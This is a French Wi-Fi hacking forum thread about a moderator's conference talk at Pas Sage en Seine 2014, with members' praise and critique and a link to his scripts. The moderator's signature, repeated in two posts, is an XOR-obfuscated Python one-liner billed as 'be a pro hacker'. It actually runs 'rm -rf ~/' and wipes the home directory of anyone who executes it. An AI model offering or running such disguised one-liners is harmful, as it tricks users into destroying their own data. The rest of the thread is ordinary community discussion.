Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 25-06-2014 20:37:07

spawn
Modérateur

Ce dimanche, à passage en seine (#PSES2014), je parle de Wi-Fi.

Dimanche à midi je fais une petite conférence à passageenseine (au NUMA à paris, un coin branché)
En plus de faire un état des lieux, j'aimerais citer quelques trucs croustillants qu'on a vu passer ces dernières années par ici.
Je suis à votre écoute.

Mon plan :
- présentation du Wi-Fi, rappels
- descriptions du fonctionnement à travers différentes phases
- koman piraté un reso wifi §?
- le professionalisme des constructeurs, option YOLO
- les joies de crack-wifi.com

Au passage je me permet de vous inviter à boire une bière biere

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 25-06-2014 21:59:31

koala
Membre d'honneur
Lieu : In the sky

Re : Ce dimanche, à passage en seine (#PSES2014), je parle de Wi-Fi.

Dommage que je sois pas dans le coin ce week-end la wink

#3 26-06-2014 16:57:43

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Dommage aussi...
....Une ch'tite mousse avec cette chaleur...
Le projet est vraiment sympa
....et j'aurais bien aimé rencontrer ta mamie ( c'est sûrement l'une de celles qui expliquent ce qu'est un hacker dans le vidéo sur la web. big_smile .. )
Dans tous les cas bravo pour ta participation à cette excellente initiative
La savoir ne vaut que s'il est partagé par tous...
     ... I like it. smile

#4 26-06-2014 18:23:18

Furyo
Membre Irremplaçable
Site Web

J'aurrai aimé aussi être dans le coin, pas pour la biere mais pour discuter wink

Bravo pour ton intervention wink cool

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#5 26-06-2014 22:31:38

M1ck3y
Administrateur
Lieu : Lost in the darkness

plus_un pour la bière, malheureusement je ne serai pas dans le coin, mais j'en boirais une à ta santé du coup, c'est promis biere

#6 30-06-2014 18:50:31

spawn
Modérateur

Bilan, tout le monde a semblé apprécier.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#7 30-06-2014 21:08:20

koala
Membre d'honneur
Lieu : In the sky

Super ^^ j'ai regarder une bonne partie vraiment bravo, très intéressant et riche en information ! smile

Je suis pour ce genre d'intervention cool

#8 30-06-2014 23:50:54

M1ck3y
Administrateur
Lieu : Lost in the darkness

Mon passage préféré: "Je me suis promené avec ce PC là dans mon sac en dumpant tout, normal; sur les canaux 1, 6 et 11 avec 3 cartes Wifi, comme tout le monde" J'adore, c'est juste mythique. Un humour que seuls les pentesters Wifi peuvent partager lol

Et plus_un pour le partage de scripts wink

J'ai regardé la vidéo, puisque je n'étais pas sur place, et j'ai bien apprécié ce tour d'horizon. Tu as abordé l'essentiel dans le temps qui t'étais imparti, en soulevant bien le problème du cruel manque de sécurité lié aux réseaux Wifi et aux quantités de données qui y circulent, et en meme temps la quasi impossibilité d'échapper à cette fuite permanente d'informations potentiellement sensibles. Je pense que ton talk est et restera un indispensable pour tous les passionnés francophones, car il permet de découvrir de manière condensée la plupart des thématiques que nous abordons ici sur le forum plus en détail.

Tu as du talent, je ne me fais pas de souci pour ton avenir wink

Chapeau l'artiste, merci pour les références à la communauté au passage, et on attend la prochaine conf, avec encore plus de mordant: escalades de privilèges multiples sur différents modèles de routeurs Wifi en direct, sur du matériel en local et à distance choisi aléatoirement parmi des résultats Shodan, démonstration de la dangerosité d'une rogue AP combinée à du spoof DNS / phishing avec récupération de credentials, initiation à la prudence lors de l'utilisation de TOR (car le relais de sortie peut parfaitement sniffer tout ce qui passe pour extraire des usernames, passwords, cookies etc... ). J'ai le senstiment que tu ne t'es pas encore laché à fond big_smile

#9 01-07-2014 15:24:03

kcdtv
Membre d'honneur
Lieu : Internacionaluña

<3

Je me demandais si la conf allée être filmée et si il y aurait moyen de la voir...

En tous cas bravo, énorme, car ce n'est vraiment pas facile d'aborder tout ça, et merci pour le partage. smile

C'est très intéressant du début à la fin avec la petite expérience "in situ" en fin de conf qui vient comme la cerise sur la gâteau -  et sans kernel panique tongue - : la classe! cool

Chapeau!

#10 01-07-2014 20:41:39

Furyo
Membre Irremplaçable
Site Web

Alors pour ma part et après vu ta vidéo :

1/ Tout d'abord un grand bravo pour ton courage

Je m'explique...
On se rend compte de ton état de stress à travers tes défauts de diction que tu tentes de masquer et c'est magnifique.
Tu gardes le sens et la progression du schéma que tu as voulu transmettre dans ton message.

2/ Je trouve ton intervention manquante de participation vis à vis du publique mais cela est surement dû au temps que tu as ou que l'on t'a impartit pour cette dernière.

3/ Tu renvois trop souvent à des choses "que l'on verra plus tard" ce qui souligne une mauvaise organisation de ton déroulement..

4/ Tu es très "Pro", parfois peut-être trop pour des néophytes, alors que tu sauras trois secondes avant, imager de manière parfaite pour l'ensemble du commun des mortels...

J'en retiens (et ne te connaissant pas personnellement), plusieurs choses..

- une organisation différente dans ta conférence avec plus de participations
- garde ton sens de l'humour c'est parfait, là c'est 20/20 wink
- développe en te tenant à l'essentiel du message que tu souhaites faire passer car dans la première moitié de la vidéo je ne savais plus ou tu voulais en venir...

Alors avant que tu me dises, faisant autant, etc..

Je n'ai aucunes prétentions à vouloir et/ou savoir ce que tu as voulu donner comme message à travers ton intervention.
Je ne veux que te donner des conseils car le contenu est excellent mais mal organisé..

Ceci étant, et toutes raisons gardées, j'admire encore une fois ce que tu as fait et le courage dont tu as fais preuve pour transmettre les données que tu possèdes publiquement wink

Ne voit en rien un jugement mais j'interviens regulierement publiquement (juridiquement) et c'est la raison qui m'a poussé à te donner un avis objectif wink

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#11 02-07-2014 01:57:45

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Bravo Spawn smile

#12 02-07-2014 20:07:35

spawn
Modérateur

merci (:

J'ai dit plein de fois «on s'en fout» parce que je voulais couper des nœuds de l'arbre que mon discours aurait pu parcourir.
Comme la route est longue entre le début et la fin, ça fait beaucoup de branches futiles à élaguer.

Les scripts sont ici : https://github.com/qolund/derp/tree/mas … p-analysis

@9b0ae3c4 méric.fr

#13 03-07-2014 17:56:38

Fab955
Membre Irremplaçable

Je n'ai pas encore tout regardé, mais le peu que j'ai vu pour le moment me plaît bien. J'ai hâte de regarder la suite mais en tout cas c'est bien ce que tu as fait. J'aurais été à Paris je serais venu.

Signé "l'incompétent" lol wink

En tout cas merci de nous l'avoir partagé!

Annonce